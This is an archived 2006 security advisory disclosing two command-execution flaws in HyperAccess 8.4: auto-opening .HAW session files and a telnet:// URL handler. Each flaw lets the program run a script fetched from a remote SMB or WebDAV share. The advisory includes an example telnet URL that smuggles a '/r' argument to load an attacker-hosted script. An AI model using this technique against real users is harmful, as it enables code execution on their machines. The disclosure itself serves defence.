what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hyperaccess84.txt

hyperaccess84.txt
Posted Dec 15, 2006
Authored by Brett Moore SA

Hyper Access version 8.4 suffers from multiple command execution vulnerabilities.

tags | advisory, vulnerability
SHA-256 | f80fc49dfe1d0c19441f024ce5707fa40f9889fac4146b376d88524c20396f30

hyperaccess84.txt

Change Mirror Download
Not long now...

========================================================================
= Hyper Access - Multiple Vulnerabilities
=
= Vendor Website:
= http://www.hilgraeve.com
=
= Affected Software:
= Hyper Access 8.4 (and possibly lower)
=
= Public disclosure on Thursday December 14, 2006
========================================================================

== Overview ==

HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and
HyperTerminal Private Edition. It is the product from which
HyperTerminal
and HyperTerminal Private Edition are derived. HyperAccess offers a wide

array of additional capabilities, with a similar look andfeel.

This advisory discloses two separate (but similar) security issues in
the latest version of HyperAccess .

* Command Execution Through .HAW Opening *

HyperAccess saves 'sessions' as .haw files. These extensions are setup
to
open without user intervention, through the editflags setting the in the

registry key:

HKEY_CLASSES_ROOT\HAWin32\EditFlags.

If a user, using Internet Explorer, browses to a web site that hosts a
.HAW, an automatic download and open can be forced. The file will be
opened and parsed by the installed version of HyperAccess.

A .HAW file can be saved with an option 'Script To Run Before
Connecting'
and this can be setup to load a script file from either an SMB share or

a WEBDAV web share.

The script command offered by HyperAccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.

A suggested fix is to remove/modify the editflags setting to prevent the

automatic opening and parsing of .HAW files.


* Command Execution Through Telnet URL Protocol *

HyperAccess sets up a URL Protocol to handle the telnet:// URL handler.
This setting can be viewed in the registry key:

HKEY_CLASSES_ROOT\telnet\shell\open\command

which is set to

c:\program files\hawin32\hawin32.exe /t %1

HyperAccess will accept /r as a command line parameter to specify a
script file to run. This command can be passed on the URL through
Internet
Explorer using a URL such as;

telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

Where SERVER is an SMB share or a WEBDAV web share hosting a malicious
script to run.

The script command offered by Hyperaccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.


A suggested fix is to remove the telnet handler from the registry.


== Solutions ==

Currently, the issues outlined in the report have been added to a
list of issues to evaluate during the next update of HyperACCESS.
There is currently no planned date for this update.

== Credit ==

Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of
Australia supplier and sits on the Australian Government
Attorney-General's Department Critical Infrastructure Project panel.
We are certified by both Visa and MasterCard under their Payment
Card Industry Data Security Standard Programs.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close